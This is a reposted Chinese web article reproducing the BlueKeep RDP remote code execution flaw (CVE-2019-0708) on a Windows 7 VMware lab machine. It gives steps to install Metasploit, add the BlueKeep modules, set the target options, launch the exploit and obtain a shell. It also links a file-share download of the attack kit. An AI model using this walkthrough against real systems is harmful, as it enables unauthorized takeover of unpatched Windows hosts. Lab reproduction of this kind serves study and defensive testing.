设为首页 - 加入收藏 ASP站长网(Aspzz.Cn)- 科技、建站、经验、云计算、5G、大数据,站长网!
热搜: 创业者 手机 数据
当前位置: 首页 > 服务器 > 系统 > 正文

CVE-2019-0708远程桌面代码执行漏洞复现

发布时间:2021-01-05 04:12 所属栏目:52 来源:网络整理
导读:漏洞环境 使用VMware 安装Windows7 SP1模拟受害机 ? ? 利用 攻击工具准备 1.使用如下命令一键更新安装的metasploit框架 curl https: // raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupd

漏洞环境

使用VMware 安装Windows7 SP1模拟受害机

CVE-2019-0708远程桌面代码执行漏洞复现

?

?

利用

攻击工具准备

  • 1.使用如下命令一键更新安装的metasploit框架
  • curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb> msfinstall && chmod 755 msfinstall && ./msfinstall

    ?

  • 2.下载参考中的攻击套件放置文件到MSF的相应文件夹(如果已存在同名文件,直接覆盖即可)
  • rdp.rb  - > /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
    rdp_scanner.rb  - > /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
    cve_2019_0708_bluekeep.rb  - > /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
    cve_2019_0708_bluekeep_rce.rb  - > /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

?

CVE-2019-0708远程桌面代码执行漏洞复现

?

?

攻击命令

使用msfconsole展示进入Metasploit的框架

展示进入以后使用reload_all重新加载0708rdp模块利用

使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce启用0708RDP模块攻击

使用info查看工具相关信息以及设置

CVE-2019-0708远程桌面代码执行漏洞复现

?可见关键设置主要为RHOSTS\?RPORT\target

使用set RHOSTS 受害机IP设置受害机IP

使用set RPORT 受害机PORT设置受害机RDP端口号

使用set target ID数字(可选为0-4)设置受害机机器架构

这里我们使用的是VMware ,那么目标2满足条件

使用exploit开始攻击,等待建立连接?建立连接以后,使用获得shell,再使用获得交互式外壳?随即完成攻击,成功拿到受害者主机权限

CVE-2019-0708远程桌面代码执行漏洞复现

?

?

参考

链接:https://pan.baidu.com/s/1v3B8Vvi26W7LWjO3IcsNZg?提取码:ml9g?

(编辑:ASP站长网)

    网友评论
    推荐文章
      热点阅读